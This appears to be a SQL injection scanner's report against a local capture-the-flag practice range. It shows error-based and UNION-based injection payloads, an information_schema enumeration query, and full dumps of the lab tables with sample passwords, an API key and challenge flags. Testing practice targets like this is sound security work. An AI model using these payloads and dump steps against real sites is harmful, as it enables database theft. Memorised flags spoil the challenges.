
============================================================
  BreachSQL — Scan Summary
============================================================
  Target        : http://127.0.0.1:17476/challenges/my1/users?id=1
  Duration      : 1.07s
  Requests sent : 83
  URLs crawled  : 0
  Params tested : 1
  WAF detected  : None
  Evasion used  : None
  DBMS detected : mysql

  Total findings: 6

  1. [ERROR-BASED SQLi] Confirmed
     Param   : id
     URL     : http://127.0.0.1:17476/challenges/my1/users?id=1
     Method  : GET
     DBMS    : mysql
     Payload : '
     Proof   : http://127.0.0.1:17476/challenges/my1/users?id=1%27

  2. [UNION-BASED SQLi] Confirmed
     Param    : id
     URL      : http://127.0.0.1:17476/challenges/my1/users?id=1
     Method   : GET
     Columns  : 2
     Payload  :  UNION SELECT '<marker>',NULL-- -
     Proof    : http://127.0.0.1:17476/challenges/my1/users?id=1+UNION+SELECT+%27BreachSQL_tiludd%27%2CNULL--+-

  ────────────────────────────────────────────────────────
    Extracted Data
  ────────────────────────────────────────────────────────
  3. [EXTRACTED] via union
     Param : id
     URL   : http://127.0.0.1:17476/challenges/my1/users?id=1
     Expr  : VERSION()
     Value : 8.0.46

  4. [EXTRACTED] via union
     Param : id
     URL   : http://127.0.0.1:17476/challenges/my1/users?id=1
     Expr  : CURRENT_USER()
     Value : firerange@%

  5. [EXTRACTED] via union
     Param : id
     URL   : http://127.0.0.1:17476/challenges/my1/users?id=1
     Expr  : DATABASE()
     Value : firerange

  6. [EXTRACTED] via union
     Param : id
     URL   : http://127.0.0.1:17476/challenges/my1/users?id=1
     Expr  : (SELECT GROUP_CONCAT(table_name ORDER BY table_name SEPARATOR ',') FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1)
     Value : challenges,my1_notes,my1_secrets,my1_users,my2_group_targets,my2_inbox,my2_members,my3_accounts,my3_catalog,my3_items,my3_products,my3_schema_flag,my4_agent_log,my4_api_users,my4_entries,my4_hex_store,my4_numeric_store,my4_sessions,my5_hidden,my5_kwvault,my5_oob_notes,my5_reports,my5_vault

  ────────────────────────────────────────────────────────
    Table Dumps
  ────────────────────────────────────────────────────────
  [DUMP] challenges  (0 row(s))  param:id
  +--------------+------+-------+-------------+-----------+----------+--------+------+
  | challenge_id | tier | title | description | technique | endpoint | points | flag |
  +--------------+------+-------+-------------+-----------+----------+--------+------+
  +--------------+------+-------+-------------+-----------+----------+--------+------+

  [DUMP] my1_notes  (3 row(s))  param:id
  +----+--------+-------------------------------+
  | id | author | content                       |
  +----+--------+-------------------------------+
  | 1  | admin  | FIRE{my1c_double_quote_error} |
  | 2  | alice  | meeting at 3pm                |
  | 3  | bob    | remember to patch the server  |
  +----+--------+-------------------------------+

  [DUMP] my1_secrets  (2 row(s))  param:id
  +----+---------+------------------------------------+
  | id | name    | value                              |
  +----+---------+------------------------------------+
  | 1  | flag    | FIRE{my1b_union_secrets_extracted} |
  | 2  | api_key | sk-firerange-0xdeadbeef            |
  +----+---------+------------------------------------+

  [DUMP] my1_users  (4 row(s))  param:id
  +----+----------+-------------------------+-------+
  | id | username | email                   | role  |
  +----+----------+-------------------------+-------+
  | 1  | admin    | admin@firerange.local   | admin |
  | 2  | alice    | alice@firerange.local   | user  |
  | 3  | bob      | bob@firerange.local     | user  |
  | 4  | charlie  | charlie@firerange.local | user  |
  +----+----------+-------------------------+-------+

  [DUMP] my2_group_targets  (3 row(s))  param:id
  +----+-------------+-------+----------------------------+
  | id | dept        | score | flag                       |
  +----+-------------+-------+----------------------------+
  | 1  | engineering | 42    | FIRE{my2e_having_group_by} |
  | 2  | marketing   | 17    | not_the_flag               |
  | 3  | sales       | 99    | not_the_flag               |
  +----+-------------+-------+----------------------------+

  [DUMP] my2_inbox  (3 row(s))  param:id
  +----+-------+----------------------------------+
  | id | owner | message                          |
  +----+-------+----------------------------------+
  | 1  | admin | FIRE{my2d_second_step_extracted} |
  | 2  | alice | Hello Alice                      |
  | 3  | bob   | Hello Bob                        |
  +----+-------+----------------------------------+

  [DUMP] my2_members  (4 row(s))  param:id
  +----+----------+-----------+-------------------------------------+
  | id | username | password  | secret                              |
  +----+----------+-----------+-------------------------------------+
  | 1  | admin    | hunter2   | FIRE{my2a_boolean_blind_enumerated} |
  | 2  | alice    | p@ssw0rd  | alice_private_note                  |
  | 3  | bob      | qwerty123 | bob_private_note                    |
  | 4  | mallory  | evil1337  | FIRE{my2c_or_based_bypass}          |
  +----+----------+-----------+-------------------------------------+

  [DUMP] my3_accounts  (2 row(s))  param:id
  +----+----------+-------------+--------------------------------+
  | id | username | dept        | flag                           |
  +----+----------+-------------+--------------------------------+
  | 1  | jsmith   | engineering | FIRE{my3e_paren_context_blind} |
  | 2  | jdoe     | marketing   | not_the_flag                   |
  +----+----------+-------------+--------------------------------+

  [DUMP] my3_catalog  (3 row(s))  param:id
  +----+------------+----------+--------+--------+---------------------------+
  | id | title      | brand    | sku    | price  | flag                      |
  +----+------------+----------+--------+--------+---------------------------+
  | 1  | Laptop Pro | TechCo   | LP-001 | 999.99 | FIRE{my3d_five_col_union} |
  | 2  | Mouse      | TechCo   | MS-001 | 29.99  | not_the_flag              |
  | 3  | Keyboard   | TypeFast | KB-001 | 79.99  | not_the_flag              |
  +----+------------+----------+--------+--------+---------------------------+

  [DUMP] my3_items  (3 row(s))  param:id
  +----+-----------+-----------------------------+-------+
  | id | name      | description                 | price |
  +----+-----------+-----------------------------+-------+
  | 1  | Widget A  | Standard widget             | 9.99  |
  | 2  | Widget B  | Premium widget              | 19.99 |
  | 3  | Flag Item | FIRE{my3b_path_param_pwned} | 0.01  |
  +----+-----------+-----------------------------+-------+

  [DUMP] my3_products  (3 row(s))  param:id
  +----+-----------+-------------+------------------------------+
  | id | name      | category    | flag                         |
  +----+-----------+-------------+------------------------------+
  | 1  | Product X | electronics | FIRE{my3c_multicolumn_union} |
  | 2  | Product Y | clothing    | red_herring_1                |
  | 3  | Product Z | food        | red_herring_2                |
  +----+-----------+-------------+------------------------------+

  [DUMP] my3_schema_flag  (1 row(s))  param:id
  +----+--------+--------------------------+
  | id | note   | flag                     |
  +----+--------+--------------------------+
  | 1  | hidden | FIRE{my3f_schema_walker} |
  +----+--------+--------------------------+

  [DUMP] my4_agent_log  (2 row(s))  param:id
  +----+-------------+-----------------------------+
  | id | agent       | flag                        |
  +----+-------------+-----------------------------+
  | 1  | Mozilla/5.0 | FIRE{my4f_header_injection} |
  | 2  | curl/7.0    | not_the_flag                |
  +----+-------------+-----------------------------+

  [DUMP] my4_api_users  (2 row(s))  param:id
  +---------+----------+--------------------------------+
  | user_id | username | token                          |
  +---------+----------+--------------------------------+
  | 1       | system   | FIRE{my4b_json_body_injection} |
  | 2       | service  | not_a_flag_yet                 |
  +---------+----------+--------------------------------+

  [DUMP] my4_entries  (3 row(s))  param:id
  +----+--------+-------------------------------+
  | id | label  | payload                       |
  +----+--------+-------------------------------+
  | 1  | normal | benign data                   |
  | 2  | flag   | FIRE{my4a_waf_bypass_comment} |
  | 3  | decoy  | nothing_here                  |
  +----+--------+-------------------------------+

  [DUMP] my4_hex_store  (2 row(s))  param:id
  +----+--------+----------------------------+
  | id | label  | flag                       |
  +----+--------+----------------------------+
  | 1  | public | not_the_flag               |
  | 2  | secret | FIRE{my4h_hex_char_bypass} |
  +----+--------+----------------------------+

  [DUMP] my4_numeric_store  (2 row(s))  param:id
  +----+-------+-------------------------------+
  | id | value | flag                          |
  +----+-------+-------------------------------+
  | 1  | 42    | FIRE{my4d_numeric_time_blind} |
  | 2  | 1337  | not_the_flag                  |
  +----+-------+-------------------------------+

  [DUMP] my4_sessions  (2 row(s))  param:id
  +-------------+----------+-----------------------------+
  | session_id  | username | flag                        |
  +-------------+----------+-----------------------------+
  | sess_abc123 | admin    | FIRE{my4e_cookie_injection} |
  | sess_def456 | alice    | not_the_flag                |
  +-------------+----------+-----------------------------+

  [DUMP] my5_hidden  (2 row(s))  param:id
  +----+--------+------------------------------+
  | id | key    | flag                         |
  +----+--------+------------------------------+
  | 1  | secret | FIRE{my5b_crawl_and_conquer} |
  | 2  | decoy  | not_a_flag                   |
  +----+--------+------------------------------+

  [DUMP] my5_kwvault  (1 row(s))  param:id
  +----+--------+-----------------------------+
  | id | level  | flag                        |
  +----+--------+-----------------------------+
  | 1  | legend | FIRE{my5c_keyword_doubling} |
  +----+--------+-----------------------------+

  [DUMP] my5_oob_notes  (1 row(s))  param:id
  +----+---------------------------------------------------------+-------------------------------------+
  | id | note                                                    | flag                                |
  +----+---------------------------------------------------------+-------------------------------------+
  | 1  | MySQL supports LOAD_FILE() and SELECT INTO OUTFILE f... | FIRE{my5d_oob_technique_recognised} |
  +----+---------------------------------------------------------+-------------------------------------+

  [DUMP] my5_reports  (3 row(s))  param:id
  +----+--------------+---------------------------------+---------+------------+
  | id | title        | body                            | author  | status     |
  +----+--------------+---------------------------------+---------+------------+
  | 1  | Q1 Review    | Financial summary for Q1.       | admin   | published  |
  | 2  | Incident Log | Security incident details here. | secteam | classified |
  | 3  | Dev Notes    | Internal architecture notes.    | devops  | draft      |
  +----+--------------+---------------------------------+---------+------------+

  [DUMP] my5_vault  (1 row(s))  param:id
  +----+--------+------------------------------------+
  | id | level  | flag                               |
  +----+--------+------------------------------------+
  | 1  | legend | FIRE{my5a_legend_full_chain_owned} |
  +----+--------+------------------------------------+

============================================================
